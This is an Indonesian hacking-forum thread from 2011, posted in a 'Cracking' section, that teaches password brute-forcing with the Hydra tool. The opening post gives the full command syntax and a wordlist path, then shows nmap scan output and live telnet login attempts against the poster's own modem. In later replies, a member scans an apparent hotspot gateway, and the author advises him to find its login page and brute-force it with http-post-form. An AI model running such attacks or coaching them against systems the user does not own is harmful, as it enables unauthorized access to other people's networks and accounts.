Indonesian Back|Track Team
Hydra how to- - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Cracking (https://www.indonesianbacktrack.or.id/forum/forum-126.html)
+--- Thread: Hydra how to- (/thread-994.html)

Pages: 1 2 3 4

Hydra how to- - iKONspirasi - 10-24-2011

Setelah lihat trit yg menanyakan mengenai hydra, ane pikir2 daripada jawabnya panjang dijadiin trit baru aja Smile
ok let's begin...

klo kita liat di help hydra keliatan kok bisa dipake buat apa aja:
Quote:service the service to crack. Supported protocols: cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh svn teamspeak telnet vmauthd vnc xmpp

cara pakenya tinggal:
Code:
hydra -L "userlist" -P "wordlist" ip-target service PLAIN

artinya:
-L digunakan jika kita mempunyai list user yg kemungkinan dipake (ga pake -L jg bisa kok tapi harus di sebut usernya, tapi harus huruf L kecil, contoh --> -l admin)

-P adalah wordlist yang kita punya, klo di BT5 defaulnya ada di /pentest/passwords/wordlists/darkc0de.lst

ip-target diisi target kita, bisa webserver, router, switch, apapun itu asal ada ip dan service yg berjalan (dan termasuk dalam service yg ada di hydra tentunya)

service adalah sesuai yang ada di help hydra (lebih baiknya di nmap -sV dulu)

PLAIN jika target tidak menggunakan HTTPS (jika ada gunakan -S untuk melakukan koneksi SSL)

contohnya...

pertama kita lakukan port scanning dulu dengan nmap:

Code:
root@iKONs:~# nmap -sV 192.168.1.1

Quote:Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-24 01:11 WIT
Nmap scan report for 192.168.1.1
Host is up (0.00078s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Netgear broadband router or ZyXel VoIP adapter ftpd 1.0
23/tcp open telnet Netgear broadband router or ZyXel VoIP adapter telnetd
80/tcp open http Allegro RomPager 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
MAC Address: D8:5D:4C:A1:9D:E7 (Tp-link Technologies Co.)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.30 seconds

dari data diatas dapat kita lihat bahwa port 23 a.k.a service telnet aktif...

kemudian mari kita jalankan hydra dengan asumsi username adalah admin dan service yang mau dibrute force adalah telnet:

Code:
root@iKONs:~# hydra -V -l admin -P /pentest/passwords/wordlists/darkc0de.lst 192.168.1.1 telnet PLAIN

Quote:Hydra v7.0 ©2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-24 01:11:50
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 server, 1707656 login tries (l:1/p:1707656), ~106728 tries per task
[DATA] attacking service telnet on port 23
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "" - child 0 - 1 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 1 - 2 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 2 - 3 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 3 - 4 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 4 - 5 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 5 - 6 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 6 - 7 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 7 - 8 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 8 - 9 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " " - child 9 - 10 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "!magnus" - child 10 - 11 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "!power" - child 11 - 12 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass ""A" SIDES" - child 12 - 13 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass ""DETROIT" GARY & CC TH WIGGINS" - child 13 - 14 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "#" - child 14 - 15 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "#" - child 15 - 16 of 1707656
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

proses diatas tidak ane lakukan sampe selese, karena pasti lama Tongue

btw target disini adalah modem ane, jd pls jangan diapa2in yak Tongue

semoga bermanfaat
M

RE: Hydra how to- - j3st3r - 10-24-2011

jadi disini fungsinya kayak bruteforce gitu ya kk..?
manteb dah.!! Brutall Attack :p

RE: Hydra how to- - iKONspirasi - 10-24-2011

yup, brutal eh brute force attack Tongue

RE: Hydra how to- - cassaprodigy - 10-24-2011

wah mantap hydra yah ? seep om nice share

RE: Hydra how to- - betefive - 10-24-2011

kalo misalnya nih om.. port telnet ga kbuka gmn om?

RE: Hydra how to- - iKONspirasi - 10-24-2011

ya kan diliat -sV di nmap bro, nanti kita liat ada service yg bisa dieksploitasi dengan hydra ato ga?

RE: Hydra how to- - betefive - 10-24-2011

(10-24-2011, 05:34 PM)konspirasi Wrote: ya kan diliat -sV di nmap bro, nanti kita liat ada service yg bisa dieksploitasi dengan hydra ato ga?

dah di coba ni reportnya :

Spoiler! :


Code:
# nmap -sV 10.100.0.1

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-23 23:29 WIT
Nmap scan report for hotspot.zone.net (10.100.0.1)
Host is up (0.094s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE VERSION
53/tcp  open  domain  Mikrotik RouterOS named or OpenDNS Updater
80/tcp  open  http?
443/tcp open  https?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port80-TCP:V=5.59BETA1%I=7%D=10/23%Time=4EA440F5%P=i686-pc-linux-gnu%r(
SF:GetRequest,181,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache\r\
SF:nConnection:\x20close\r\nContent-Length:\x20227\r\nContent-Type:\x20tex
SF:t/html\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:12\x20GMT\r\nExpi
SF:res:\x200\r\n\r\n<html>\n<head>\n<title>\.\.\.</title>\n<meta\x20http-e
SF:quiv=\"refresh\"\x20content=\"5;\x20url=http://hotspot\.zone\.net/statu
SF:s\">\n<meta\x20http-equiv=\"pragma\"\x20content=\"no-cache\">\n<meta\x2
SF:0http-equiv=\"expires\"\x20content=\"-1\">\n</head>\n<body>\n</body>\n<
SF:/html>\n")%r(HTTPOptions,EF,"HTTP/1\.0\x20503\x20unknown\x20method\r\nC
SF:onnection:\x20close\r\nContent-Length:\x20119\r\nDate:\x20Mon,\x2024\x2
SF:0Oct\x202011\x2009:32:12\x20GMT\r\nExpires:\x200\r\n\r\n<html>\n<head><
SF:title>Error\x20503:\x20unknown\x20method</title></head>\n<body>\n<h1>Er
SF:ror\x20503:\x20unknown\x20method</h1>\n</body>\n</html>\n")%r(RTSPReque
SF:st,EF,"HTTP/1\.0\x20503\x20unknown\x20method\r\nConnection:\x20close\r\
SF:nContent-Length:\x20119\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:
SF:12\x20GMT\r\nExpires:\x200\r\n\r\n<html>\n<head><title>Error\x20503:\x2
SF:0unknown\x20method</title></head>\n<body>\n<h1>Error\x20503:\x20unknown
SF:\x20method</h1>\n</body>\n</html>\n")%r(FourOhFourRequest,E0,"HTTP/1\.0
SF:\x20404\x20Not\x20Found\r\nConnection:\x20close\r\nContent-Length:\x201
SF:09\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:17\x20GMT\r\nExpires:
SF:\x200\r\n\r\n<html>\n<head><title>Error\x20404:\x20Not\x20Found</title>
SF:</head>\n<body>\n<h1>Error\x20404:\x20Not\x20Found</h1>\n</body>\n</htm
SF:l>\n")%r(GenericLines,E6,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nConnect
SF:ion:\x20close\r\nContent-Length:\x20113\r\nDate:\x20Mon,\x2024\x20Oct\x
SF:202011\x2009:32:17\x20GMT\r\nExpires:\x200\r\n\r\n<html>\n<head><title>
SF:Error\x20400:\x20Bad\x20Request</title></head>\n<body>\n<h1>Error\x2040
SF:0:\x20Bad\x20Request</h1>\n</body>\n</html>\n")%r(Help,E6,"HTTP/1\.0\x2
SF:0400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Length:\x2011
SF:3\r\nDate:\x20Mon,\x2024\x20Oct\x202011\x2009:32:36\x20GMT\r\nExpires:\
SF:x200\r\n\r\n<html>\n<head><title>Error\x20400:\x20Bad\x20Request</title
SF:></head>\n<body>\n<h1>Error\x20400:\x20Bad\x20Request</h1>\n</body>\n</
SF:html>\n");
MAC Address: 00:15:6D:67:76:22 (Ubiquiti Networks)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.71 seconds



RE: Hydra how to- - iKONspirasi - 10-24-2011

port 53 dipastikan tidak ada di service hydra

port 80 dan 443 bisa tapi jika ada aplikasi web dijalankan disitu, coba aja buka pake browser bro http://10.100.0.1 trus https://10.100.0.1, ada halaman login ga?

klo ga ada kemungkinan memang tidak dapat diakses dari ip diluar ip internalnya, jadi ga bisa dieksploitasi dengan hydra

RE: Hydra how to- - betefive - 10-24-2011

ow gtu ya om...
http ada om, tp https ga ada, trus cara exploitasi http gmn om?

RE: Hydra how to- - iKONspirasi - 10-24-2011

di service ada http[s]-{head|get} dan http[s]-{get|post}-form, disitu ada form username n password kan? berarti dia menggunakan metode post, karena hanya http kita gunakan yang:

Code:
http-post-form